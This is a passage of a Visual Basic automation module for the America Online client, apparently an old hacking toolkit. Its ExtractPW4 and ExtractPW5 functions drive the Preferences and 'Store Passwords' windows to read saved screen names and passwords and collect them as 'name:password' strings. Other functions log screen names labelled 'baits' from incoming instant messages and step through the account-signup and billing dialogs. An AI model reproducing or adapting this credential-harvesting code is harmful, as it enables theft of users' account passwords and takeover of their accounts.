  2724. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2725. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2726. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2727. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2728. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2729. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2730. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2731. Loop Until pWin& <> 0& And pButton& <> 0&
  2732.  
  2733. 'Call ShowWindow(pWin&, SW_HIDE)
  2734.  
  2735. Call SendMessage(pButton&, WM_LBUTTONDOWN, 0&, 0&)
  2736. Call SendMessage(pButton&, WM_LBUTTONUP, 0&, 0&)
  2737.  
  2738. FindAgain:
  2739.  
  2740. Do
  2741. DoEvents
  2742. sWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Store Passwords")
  2743. sStatic& = FindWindowEx(sWin&, 0&, "_AOL_Static", vbNullString)
  2744.  
  2745. mWin& = FindWindow("#32770", "America Online")
  2746. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  2747. Loop Until sWin& <> 0& And sStatic& <> 0& Or mWin& <> 0& And mBut& <> 0&
  2748.  
  2749. sStatic& = FindWindowEx(sWin&, sStatic&, "_AOL_Static", vbNullString)
  2750. sStatic& = FindWindowEx(sWin&, sStatic&, "_AOL_Static", vbNullString)
  2751. sStatic& = FindWindowEx(sWin&, sStatic&, "_AOL_Static", vbNullString)
  2752. sStatic& = FindWindowEx(sWin&, sStatic&, "_AOL_Static", vbNullString)
  2753.  
  2754. sStatic1& = FindWindowEx(sWin&, sStatic&, "_AOL_Static", vbNullString)
  2755.  
  2756. sStatic2& = FindWindowEx(sWin&, sStatic1&, "_AOL_Static", vbNullString)
  2757. sStatic2& = FindWindowEx(sWin&, sStatic2&, "_AOL_Static", vbNullString)
  2758. sStatic2& = FindWindowEx(sWin&, sStatic2&, "_AOL_Static", vbNullString)
  2759.  
  2760. sStatic3& = FindWindowEx(sWin&, sStatic2&, "_AOL_Static", vbNullString)
  2761. sStatic3& = FindWindowEx(sWin&, sStatic3&, "_AOL_Static", vbNullString)
  2762. sStatic3& = FindWindowEx(sWin&, sStatic3&, "_AOL_Static", vbNullString)
  2763.  
  2764. sStatic4& = FindWindowEx(sWin&, sStatic3&, "_AOL_Static", vbNullString)
  2765. sStatic4& = FindWindowEx(sWin&, sStatic4&, "_AOL_Static", vbNullString)
  2766. sStatic4& = FindWindowEx(sWin&, sStatic4&, "_AOL_Static", vbNullString)
  2767.  
  2768. sStatic5& = FindWindowEx(sWin&, sStatic4&, "_AOL_Static", vbNullString)
  2769. sStatic5& = FindWindowEx(sWin&, sStatic5&, "_AOL_Static", vbNullString)
  2770. sStatic5& = FindWindowEx(sWin&, sStatic5&, "_AOL_Static", vbNullString)
  2771.  
  2772. sStatic6& = FindWindowEx(sWin&, sStatic5&, "_AOL_Static", vbNullString)
  2773. sStatic6& = FindWindowEx(sWin&, sStatic6&, "_AOL_Static", vbNullString)
  2774. sStatic6& = FindWindowEx(sWin&, sStatic6&, "_AOL_Static", vbNullString)
  2775.  
  2776. sStatic7& = FindWindowEx(sWin&, sStatic6&, "_AOL_Static", vbNullString)
  2777. sStatic7& = FindWindowEx(sWin&, sStatic7&, "_AOL_Static", vbNullString)
  2778. sStatic7& = FindWindowEx(sWin&, sStatic7&, "_AOL_Static", vbNullString)
  2779.  
  2780. sEdit1& = FindWindowEx(sWin&, 0&, "_AOL_Edit", vbNullString)
  2781. sEdit2& = FindWindowEx(sWin&, sEdit1&, "_AOL_Edit", vbNullString)
  2782. sEdit3& = FindWindowEx(sWin&, sEdit2&, "_AOL_Edit", vbNullString)
  2783. sEdit4& = FindWindowEx(sWin&, sEdit3&, "_AOL_Edit", vbNullString)
  2784. sEdit5& = FindWindowEx(sWin&, sEdit4&, "_AOL_Edit", vbNullString)
  2785. sEdit6& = FindWindowEx(sWin&, sEdit5&, "_AOL_Edit", vbNullString)
  2786. sEdit7& = FindWindowEx(sWin&, sEdit6&, "_AOL_Edit", vbNullString)
  2787.  
  2788. If mWin& <> 0& Then
  2789. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  2790. Call PostMessage(mBut&, WM_KEYUP, VK_SPACE, 0&)
  2791. ExtractPW4 = ""
  2792. Call PostMessage(pWin&, WM_CLOSE, 0&, 0&)
  2793. Exit Function
  2794. End If
  2795.  
  2796. 'Call ShowWindow(sWin&, SW_HIDE)
  2797.  
  2798. If sStatic1& <> 0& Then sSN1$ = Trim(GetText(sStatic1&)) Else sSN1$ = ""
  2799. If sStatic2& <> 0& Then sSN2$ = Trim(GetText(sStatic2&)) Else sSN2$ = ""
  2800. If sStatic3& <> 0& Then sSN3$ = Trim(GetText(sStatic3&)) Else sSN3$ = ""
  2801. If sStatic4& <> 0& Then sSN4$ = Trim(GetText(sStatic4&)) Else sSN4$ = ""
  2802. If sStatic5& <> 0& Then sSN5$ = Trim(GetText(sStatic5&)) Else sSN5$ = ""
  2803. If sStatic6& <> 0& Then sSN6$ = Trim(GetText(sStatic6&)) Else sSN6$ = ""
  2804. If sStatic7& <> 0& Then sSN7$ = Trim(GetText(sStatic7&)) Else sSN7$ = ""
  2805.  
  2806. If sEdit1& <> 0& Then sPW1$ = GetText(sEdit1&) Else sPW1$ = ""
  2807. If sEdit2& <> 0& Then sPW2$ = GetText(sEdit2&) Else sPW2$ = ""
  2808. If sEdit3& <> 0& Then sPW3$ = GetText(sEdit3&) Else sPW3$ = ""
  2809. If sEdit4& <> 0& Then sPW4$ = GetText(sEdit4&) Else sPW4$ = ""
  2810. If sEdit5& <> 0& Then sPW5$ = GetText(sEdit5&) Else sPW5$ = ""
  2811. If sEdit6& <> 0& Then sPW6$ = GetText(sEdit6&) Else sPW6$ = ""
  2812. If sEdit7& <> 0& Then sPW7$ = GetText(sEdit7&) Else sPW7$ = ""
  2813.  
  2814. If sSN1$ = "Screenname" Then GoTo FindAgain
  2815. If sSN2$ = "Screenname" Then GoTo FindAgain
  2816. If sSN3$ = "Screenname" Then GoTo FindAgain
  2817. If sSN4$ = "Screenname" Then GoTo FindAgain
  2818. If sSN5$ = "Screenname" Then GoTo FindAgain
  2819. If sSN6$ = "Screenname" Then GoTo FindAgain
  2820. If sSN7$ = "Screenname" Then GoTo FindAgain
  2821.  
  2822. If sPW1$ = "Password" Then GoTo FindAgain
  2823. If sPW2$ = "Password" Then GoTo FindAgain
  2824. If sPW3$ = "Password" Then GoTo FindAgain
  2825. If sPW4$ = "Password" Then GoTo FindAgain
  2826. If sPW5$ = "Password" Then GoTo FindAgain
  2827. If sPW6$ = "Password" Then GoTo FindAgain
  2828. If sPW7$ = "Password" Then GoTo FindAgain
  2829.  
  2830. pWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Preferences")
  2831.  
  2832. Call PostMessage(pWin&, WM_CLOSE, 0&, 0&)
  2833. Call PostMessage(sWin&, WM_CLOSE, 0&, 0&)
  2834.  
  2835. If sSN1$ <> "" And sPW1$ <> "" And sSN1$ <> "Screenname" Then
  2836. Stored$ = Stored$ + "" + sSN1$ + ":" + sPW1$ + "" + vbCrLf
  2837. End If
  2838.  
  2839. If sSN2$ <> "" And sPW2$ <> "" And sSN1$ <> "Screenname" Then
  2840. Stored$ = Stored$ + "" + sSN2$ + ":" + sPW2$ + "" + vbCrLf
  2841. End If
  2842.  
  2843. If sSN3$ <> "" And sPW3$ <> "" And sSN1$ <> "Screenname" Then
  2844. Stored$ = Stored$ + "" + sSN3$ + ":" + sPW3$ + "" + vbCrLf
  2845. End If
  2846.  
  2847. If sSN4$ <> "" And sPW4$ <> "" And sSN1$ <> "Screenname" Then
  2848. Stored$ = Stored$ + "" + sSN4$ + ":" + sPW4$ + "" + vbCrLf
  2849. End If
  2850.  
  2851. If sSN5$ <> "" And sPW5$ <> "" And sSN1$ <> "Screenname" Then
  2852. Stored$ = Stored$ + "" + sSN5$ + ":" + sPW5$ + "" + vbCrLf
  2853. End If
  2854.  
  2855. If sSN6$ <> "" And sPW6$ <> "" And sEdit6& <> sEdit1& And sSN1$ <> "Screenname" Then
  2856. Stored$ = Stored$ + "" + sSN6$ + ":" + sPW6$ + "" + vbCrLf
  2857. End If
  2858.  
  2859. If sSN7$ <> "" And sPW7$ <> "" And sEdit7& <> sEdit1& And sSN1$ <> "Screenname" Then
  2860. Stored$ = Stored$ + "" + sSN7$ + ":" + sPW7$ + "" + vbCrLf
  2861. End If
  2862.  
  2863. If Stored$ <> "" Then
  2864. 'Stored$ = "[stored]" + vbCrLf + Stored$
  2865. End If
  2866.  
  2867. ExtractPW4$ = Stored$
  2868. End Function
  2869.  
  2870. Public Function ExtractPW5() As String
  2871. 'SUPPOSED to extract user's password on aol 5.0
  2872. 'but aol 5.0 won't let you view other passwords..
  2873. Dim aol As Long, mdi As Long, tool As Long, Toolbar As Long, CurPos As POINTAPI
  2874. Dim WinVis As Long, sMod As Long, pWin As Long, pButton As Long
  2875. Dim sWin As Long, sStatic As Long, mWin As Long, mBut As Long
  2876. Dim sStatic1 As Long, sStatic2 As Long, sStatic3 As Long, sStatic4 As Long, sStatic5 As Long, sStatic6 As Long, sStatic7 As Long
  2877. Dim sEdit1 As Long, sEdit2 As Long, sEdit3 As Long, sEdit4 As Long, sEdit5 As Long, sEdit6 As Long, sEdit7 As Long
  2878. Dim sSN1 As String, sSN2 As String, sSN3 As String, sSN4 As String, sSN5 As String, sSN6 As String, sSN7 As String
  2879. Dim sPW1 As String, sPW2 As String, sPW3 As String, sPW4 As String, sPW5 As String, sPW6 As String, sPW7 As String
  2880. Dim Stored As String, sEdit As Long, KaiPW As String
  2881.  
  2882. If GetUser$ = "" Then ExtractPW5 = "": Exit Function
  2883.  
  2884. If AOLVersion = "4" Then
  2885. ExtractPW5$ = ExtractPW4
  2886. Exit Function
  2887. End If
  2888.  
  2889. aol& = FindWindow("AOL Frame25", vbNullString)
  2890. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  2891.  
  2892. Call OpenPrefs
  2893.  
  2894. Do
  2895. DoEvents
  2896. pWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Preferences")
  2897. pButton& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
  2898. Do
  2899. DoEvents
  2900. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2901. Loop Until pButton& = 0&
  2902.  
  2903. pButton& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
  2904. Do
  2905. DoEvents
  2906. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2907. Loop Until pButton& = 0&
  2908.  
  2909. pButton& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
  2910. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2911. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2912. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2913. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2914. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2915. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2916. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2917. Loop Until pWin& <> 0& And pButton& <> 0&
  2918.  
  2919. 'Call ShowWindow(pWin&, SW_HIDE)
  2920.  
  2921. Call SendMessage(pButton&, WM_LBUTTONDOWN, 0&, 0&)
  2922. Call SendMessage(pButton&, WM_LBUTTONUP, 0&, 0&)
  2923.  
  2924. FindAgain:
  2925.  
  2926. Do
  2927. DoEvents
  2928. sWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Store Passwords")
  2929. sStatic& = FindWindowEx(sWin&, 0&, "_AOL_Static", vbNullString)
  2930. sEdit& = FindWindowEx(sWin&, 0&, "_AOL_Edit", vbNullString)
  2931.  
  2932. mWin& = FindWindow("#32770", "America Online")
  2933. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  2934. Loop Until sWin& <> 0& And sStatic& <> 0& And sEdit& <> 0& Or mWin& <> 0& And mBut& <> 0&
  2935.  
  2936.  
  2937. If mWin& <> 0& Then
  2938. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  2939. Call PostMessage(mBut&, WM_KEYUP, VK_SPACE, 0&)
  2940. ExtractPW5 = ""
  2941. Call PostMessage(pWin&, WM_CLOSE, 0&, 0&)
  2942. Exit Function
  2943. End If
  2944.  
  2945. KaiPW$ = GetText(sEdit&)
  2946.  
  2947. ExtractPW5$ = GetUser$ + ":" + KaiPW$
  2948.  
  2949. Call PostMessage(pWin&, WM_CLOSE, 0&, 0&)
  2950. Call PostMessage(sWin&, WM_CLOSE, 0&, 0&)
  2951. End Function
  2952.  
  2953. Public Sub FavKeyword(KW As String)
  2954. 'uses 'favorite places' to run keyword
  2955. Dim aol As Long, mdi As Long, KWWin As Long, KWEdit As Long
  2956.  
  2957. aol& = FindWindow("AOL Frame25", vbNullString)
  2958. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  2959.  
  2960. Call RunTBMenu(7&, 3&)
  2961.  
  2962. Do
  2963. DoEvents
  2964. KWWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Keyword")
  2965. KWEdit& = FindWindowEx(KWWin&, 0&, "_AOL_Edit", vbNullString)
  2966. Loop Until KWWin& <> 0& And KWEdit& <> 0&
  2967.  
  2968. Call SendMessageByString(KWEdit&, WM_SETTEXT, 0&, KW$)
  2969. Call SendMessageLong(KWEdit&, WM_CHAR, ENTER_KEY, 0&)
  2970. End Sub
  2971.  
  2972. Public Function FileExists(feFile As String) As Boolean
  2973. 'checks if file is on user's computer
  2974. If Len(feFile$) = 0 Then
  2975. FileExists = False
  2976. Exit Function
  2977. End If
  2978. If Len(Dir$(feFile$)) Then
  2979. FileExists = True
  2980. Else
  2981. FileExists = False
  2982. End If
  2983. End Function
  2984.  
  2985. Public Function Find1() As Long
  2986. 'this function helps find 1
  2987. 'of the modals using in the
  2988. '"createicase" function
  2989. Dim mWin As Long, mStatic As Long
  2990. mWin& = FindWindow("_AOL_Modal", vbNullString)
  2991. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  2992. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "Create Your America Online Account Now") <> 0& Then
  2993. Find1& = mWin&
  2994. Exit Function
  2995. Else
  2996. Do
  2997. mWin& = FindWindowEx(0&, mWin&, "_AOL_Modal", vbNullString)
  2998. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  2999. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "Create Your America Online Account Now") <> 0& Then
  3000. Find1& = mWin&
  3001. Exit Function
  3002. End If
  3003. Loop Until mWin& = 0&
  3004. End If
  3005. Find1& = mWin&
  3006. End Function
  3007.  
  3008. Public Function Find2() As Long
  3009. 'this function helps find 1
  3010. 'of the modals using in the
  3011. '"createicase" function
  3012. Dim mWin As Long, mStatic As Long
  3013. mWin& = FindWindow("_AOL_Modal", vbNullString)
  3014. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3015. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "Your AOL Instant Messenger Screen Name") <> 0& Then
  3016. Find2& = mWin&
  3017. Exit Function
  3018. Else
  3019. Do
  3020. mWin& = FindWindowEx(0&, mWin&, "_AOL_Modal", vbNullString)
  3021. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3022. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "Your AOL Instant Messenger Screen Name") <> 0& Then
  3023. Find2& = mWin&
  3024. Exit Function
  3025. End If
  3026. Loop Until mWin& = 0&
  3027. End If
  3028. Find2& = mWin&
  3029. End Function
  3030.  
  3031. Public Function Find3() As Long
  3032. 'this function helps find 1
  3033. 'of the modals using in the
  3034. '"createicase" function
  3035. Dim mWin As Long, mStatic As Long
  3036. mWin& = FindWindow("_AOL_Modal", vbNullString)
  3037. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3038. mStatic& = FindWindowEx(mWin&, mStatic&, "_AOL_Static", vbNullString)
  3039. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "Member Information") <> 0& Then
  3040. Find3& = mWin&
  3041. Exit Function
  3042. Else
  3043. Do
  3044. mWin& = FindWindowEx(0&, mWin&, "_AOL_Modal", vbNullString)
  3045. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3046. mStatic& = FindWindowEx(mWin&, mStatic&, "_AOL_Static", vbNullString)
  3047. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "Member Information") <> 0& Then
  3048. Find3& = mWin&
  3049. Exit Function
  3050. End If
  3051. Loop Until mWin& = 0&
  3052. End If
  3053. Find3& = mWin&
  3054. End Function
  3055.  
  3056. Public Function Find4() As Long
  3057. 'this function helps find 1
  3058. 'of the modals using in the
  3059. '"createicase" function
  3060. Dim mWin As Long, mStatic As Long
  3061. mWin& = FindWindow("_AOL_Modal", vbNullString)
  3062. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3063. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "How Your AOL Membership Works") <> 0& Then
  3064. Find4& = mWin&
  3065. Exit Function
  3066. Else
  3067. Do
  3068. mWin& = FindWindowEx(0&, mWin&, "_AOL_Modal", vbNullString)
  3069. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3070. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "How Your AOL Membership Works") <> 0& Then
  3071. Find4& = mWin&
  3072. Exit Function
  3073. End If
  3074. Loop Until mWin& = 0&
  3075. End If
  3076. Find4& = mWin&
  3077. End Function
  3078.  
  3079. Public Function Find5() As Long
  3080. 'this function helps find 1
  3081. 'of the modals using in the
  3082. '"createicase" function
  3083. Dim mWin As Long, mStatic As Long
  3084. mWin& = FindWindow("_AOL_Modal", vbNullString)
  3085. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3086. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "Choose a Billing Method") <> 0& Then
  3087. Find5& = mWin&
  3088. Exit Function
  3089. Else
  3090. Do
  3091. mWin& = FindWindowEx(0&, mWin&, "_AOL_Modal", vbNullString)
  3092. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3093. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "Choose a Billing Method") <> 0& Then
  3094. Find5& = mWin&
  3095. Exit Function
  3096. End If
  3097. Loop Until mWin& = 0&
  3098. End If
  3099. Find5& = mWin&
  3100. End Function
  3101.  
  3102. Public Function Find6() As Long
  3103. 'this function helps find 1
  3104. 'of the modals using in the
  3105. '"createicase" function
  3106. Dim mWin As Long, mStatic As Long
  3107. mWin& = FindWindow("_AOL_Modal", vbNullString)
  3108. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3109. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "Billing Information") <> 0& Then
  3110. Find6& = mWin&
  3111. Exit Function
  3112. Else
  3113. Do
  3114. mWin& = FindWindowEx(0&, mWin&, "_AOL_Modal", vbNullString)
  3115. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3116. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "Billing Information") <> 0& Then
  3117. Find6& = mWin&
  3118. Exit Function
  3119. End If
  3120. Loop Until mWin& = 0&
  3121. End If
  3122. Find6& = mWin&
  3123. End Function
  3124.  
  3125. Public Sub findachat()
  3126. 'opens the 'find a chat' window
  3127. Dim aol As Long, mdi As Long, facWin As Long
  3128. Dim fWin As Long, fList As Long, fCount As Long
  3129. Dim pcWin As Long, pcIcon As Long
  3130.  
  3131. aol& = FindWindow("AOL Frame25", vbNullString)
  3132. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  3133.  
  3134. If aol& = 0& Or GetUser = "" Then Exit Sub
  3135.  
  3136. facWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Find a Chat")
  3137. If facWin& <> 0& Then Exit Sub
  3138.  
  3139. If AOLVersion = "4" Or AOLVersion = "5" Then
  3140. Call RunTBMenu(10&, 3&)
  3141. Else
  3142. Call KeyWord25("pc")
  3143.  
  3144. Do
  3145. DoEvents
  3146. pcWin& = FindWindowEx(mdi&, 0&, "AOL Child", " Welcome to People Connection")
  3147. pcIcon& = FindWindowEx(pcWin&, 0&, "_AOL_Icon", vbNullString)
  3148. pcIcon& = FindWindowEx(pcWin&, pcIcon&, "_AOL_Icon", vbNullString)
  3149. pcIcon& = FindWindowEx(pcWin&, pcIcon&, "_AOL_Icon", vbNullString)
  3150. pcIcon& = FindWindowEx(pcWin&, pcIcon&, "_AOL_Icon", vbNullString)
  3151. pcIcon& = FindWindowEx(pcWin&, pcIcon&, "_AOL_Icon", vbNullString)
  3152. pcIcon& = FindWindowEx(pcWin&, pcIcon&, "_AOL_Icon", vbNullString) '
  3153. pcIcon& = FindWindowEx(pcWin&, pcIcon&, "_AOL_Icon", vbNullString)
  3154. Loop Until pcWin& <> 0& And pcIcon& <> 0&
  3155.  
  3156. Call RunMenuByString("incoming text")
  3157.  
  3158. Call SendMessage(pcIcon&, WM_LBUTTONDOWN, 0&, 0&)
  3159. Call SendMessage(pcIcon&, WM_LBUTTONUP, 0&, 0&)
  3160. End If
  3161.  
  3162. Do
  3163. DoEvents
  3164. fWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Find a Chat")
  3165. fList& = FindWindowEx(fWin&, 0&, "_AOL_Listbox", vbNullString)
  3166. fList& = FindWindowEx(fWin&, fList&, "_AOL_Listbox", vbNullString)
  3167. fCount& = SendMessage(fList&, LB_GETCOUNT, 0&, 0&)
  3168. Loop Until fWin& <> 0& And fList& <> 0& And fCount& <> 0&
  3169.  
  3170. pause (1)
  3171.  
  3172. End Sub
  3173.  
  3174. Public Function FindAgree() As Long
  3175. 'this function helps find 1
  3176. 'of the modals using in the
  3177. '"createicase" function
  3178. Dim mWin As Long, mStatic As Long
  3179. mWin& = FindWindow("_AOL_Modal", vbNullString)
  3180. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3181. If mStatic& <> 0& And InStr(1, LCase(GetText(mStatic&)), "conditions of") <> 0& Then
  3182. FindAgree& = mWin&
  3183. Exit Function
  3184. Else
  3185. Do
  3186. mWin& = FindWindowEx(0&, mWin&, "_AOL_Modal", vbNullString)
  3187. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3188. If mStatic& <> 0& And InStr(1, LCase(GetText(mStatic&)), "conditions of aol membership") <> 0& Then
  3189. FindAgree& = mWin&
  3190. Exit Function
  3191. End If
  3192. Loop Until mWin& = 0&
  3193. End If
  3194. FindAgree& = mWin&
  3195. End Function
  3196.  
  3197. Public Function FindAOL25() As Long
  3198. 'finds aol 2.5
  3199. Dim AWin As Long
  3200. AWin& = FindWindow("AOL Frame25", vbNullString)
  3201. If hWndAOLVersion(AWin&) = "2.5" Or hWndAOLVersion(AWin&) = "3" Then
  3202. FindAOL25& = AWin&
  3203. Exit Function
  3204. Else
  3205. Do
  3206. AWin& = FindWindowEx(0&, AWin&, "AOL Frame25", vbNullString)
  3207. If hWndAOLVersion(AWin&) = "2.5" Or hWndAOLVersion(AWin&) = "3" Then
  3208. FindAOL25& = AWin&
  3209. Exit Function
  3210. End If
  3211. Loop Until AWin& = 0&
  3212. End If
  3213. If hWndAOLVersion(AWin&) = "2.5" Or hWndAOLVersion(AWin&) = "3" Then
  3214. FindAOL25& = AWin&
  3215. End If
  3216. End Function
  3217.  
  3218. Public Function FindAOL4() As Long
  3219. 'finds aol 4.0
  3220. Dim AWin As Long
  3221. AWin& = FindWindow("AOL Frame25", vbNullString)
  3222. If hWndAOLVersion(AWin&) = "4" Then
  3223. FindAOL4& = AWin&
  3224. Exit Function
  3225. Else
  3226. Do
  3227. AWin& = FindWindowEx(0&, AWin&, "AOL Frame25", vbNullString)
  3228. If hWndAOLVersion(AWin&) = "4" Then
  3229. FindAOL4& = AWin&
  3230. Exit Function
  3231. End If
  3232. Loop Until AWin& = 0&
  3233. End If
  3234. If hWndAOLVersion(AWin&) = "4" Then
  3235. FindAOL4& = AWin&
  3236. End If
  3237. End Function
  3238. Public Function FullDate()
  3239. Dim damonth$, daday$, dayear$, daday2$, dafulldate$
  3240. If Month(Date) = 1 Then
  3241. damonth$ = "Jan"
  3242. ElseIf Month(Date) = 2 Then
  3243. damonth$ = "Feb"
  3244. ElseIf Month(Date) = 3 Then
  3245. damonth$ = "March"
  3246. ElseIf Month(Date) = 4 Then
  3247. damonth$ = "April"
  3248. ElseIf Month(Date) = 5 Then
  3249. damonth$ = "May"
  3250. ElseIf Month(Date) = 6 Then
  3251. damonth$ = "June"
  3252. ElseIf Month(Date) = 7 Then
  3253. damonth$ = "July"
  3254. ElseIf Month(Date) = 8 Then
  3255. damonth$ = "Aug"
  3256. ElseIf Month(Date) = 9 Then
  3257. damonth$ = "Sep"
  3258. ElseIf Month(Date) = 10 Then
  3259. damonth$ = "Oct"
  3260. ElseIf Month(Date) = 11 Then
  3261. damonth$ = "Nov"
  3262. ElseIf Month(Date) = 12 Then
  3263. damonth$ = "Dec"
  3264. End If
  3265. If Weekday(Date) = 1 Then
  3266. daday$ = "Sun."
  3267. ElseIf Weekday(Date) = 2 Then
  3268. daday$ = "Mon."
  3269. ElseIf Weekday(Date) = 3 Then
  3270. daday$ = "Tue."
  3271. ElseIf Weekday(Date) = 4 Then
  3272. daday$ = "Wed."
  3273. ElseIf Weekday(Date) = 5 Then
  3274. daday$ = "Thur."
  3275. ElseIf Weekday(Date) = 6 Then
  3276. daday$ = "Fri."
  3277. ElseIf Weekday(Date) = 7 Then
  3278. daday$ = "Sat."
  3279. End If
  3280. If Day(Date) = 1 Or Day(Date) = 21 Or Day(Date) = 31 Then
  3281. daday2$ = Day(Date) & "st"
  3282. ElseIf Day(Date) = 2 Or Day(Date) = 22 Then
  3283. daday2$ = Day(Date) & "nd"
  3284. ElseIf Day(Date) = 3 Or Day(Date) = 23 Then
  3285. daday2$ = Day(Date) & "rd"
  3286. ElseIf Day(Date) = 4 Or Day(Date) = 24 Or Day(Date) = 5 Or Day(Date) = 6 Or Day(Date) = 7 Or Day(Date) = 8 Or Day(Date) = 9 Or Day(Date) = 10 Or Day(Date) = 11 Or Day(Date) = 12 Or Day(Date) = 13 Or Day(Date) = 14 Or Day(Date) = 15 Or Day(Date) = 16 Or Day(Date) = 17 Or Day(Date) = 18 Or Day(Date) = 19 Or Day(Date) = 20 Or Day(Date) = 25 Or Day(Date) = 26 Or Day(Date) = 27 Or Day(Date) = 28 Or Day(Date) = 29 Or Day(Date) = 30 Then
  3287. daday2$ = Day(Date) & "th"
  3288. End If
  3289. FullDate = daday$ & " " & damonth$ & " " & daday2$ & ", " & Year(Date)
  3290. End Function
  3291. Function gettime()
  3292. gettime = Format$(Now, "h:mm am/pm")
  3293. End Function
  3294.  
  3295. Public Sub FindBait(BaitsList As ListBox)
  3296. 'finds an im that you recieved,
  3297. 'if you did recieve an im, it
  3298. 'will add it to the BaitsList listbox,
  3299. 'and close the im
  3300. Dim IMWin As Long, imSN As String
  3301.  
  3302. IMWin& = FindReceivedIM
  3303. If IMWin& = 0& Then Exit Sub
  3304.  
  3305. imSN$ = SNfromIM(IMWin&)
  3306. BaitsList.AddItem imSN$
  3307.  
  3308. Call ChatSend("bait received: [" & BaitsList.ListCount & " baits]")
  3309. Call PostMessage(IMWin&, WM_CLOSE, 0&, 0&)
  3310. End Sub
  3311.  
  3312. Public Function FindBuddyLists() As Long
  3313. 'finds the:
  3314. ' GetUser$ + "'s Buddy List(s)"
  3315. 'window
  3316. Dim aol As Long, mdi As Long, bWin As Long
  3317.  
  3318. aol& = FindWindow("AOL Frame25", vbNullString)
  3319. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  3320. bWin& = FindWindowEx(mdi&, 0&, "AOL Child", vbNullString)
  3321.  
  3322. If InStr(1, GetText(bWin&), "'s Buddy L") <> 0& Then
  3323. FindBuddyLists& = bWin&
  3324. Exit Function
  3325. Else
  3326. Do
  3327. bWin& = FindWindowEx(mdi&, bWin&, "AOL Child", vbNullString)
  3328. If InStr(1, GetText(bWin&), "'s Buddy L") <> 0& Then
  3329. FindBuddyLists& = bWin&
  3330. Exit Function
  3331. End If
  3332. Loop Until bWin& = 0&
  3333. End If
  3334.  
  3335. FindBuddyLists& = bWin&
  3336. End Function
  3337.  
  3338. Public Function FindCancel() As Long
  3339. 'this function helps find 1
  3340. 'of the modals using in the
  3341. '"createicase" function
  3342. Dim mWin As Long, mStatic As Long
  3343. mWin& = FindWindow("_AOL_Modal", vbNullString)
  3344. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3345. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "Are You Sure You Want to Cancel") <> 0& Then
  3346. FindCancel& = mWin&
  3347. Exit Function
  3348. Else
  3349. Do
  3350. mWin& = FindWindowEx(0&, mWin&, "_AOL_Modal", vbNullString)
  3351. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
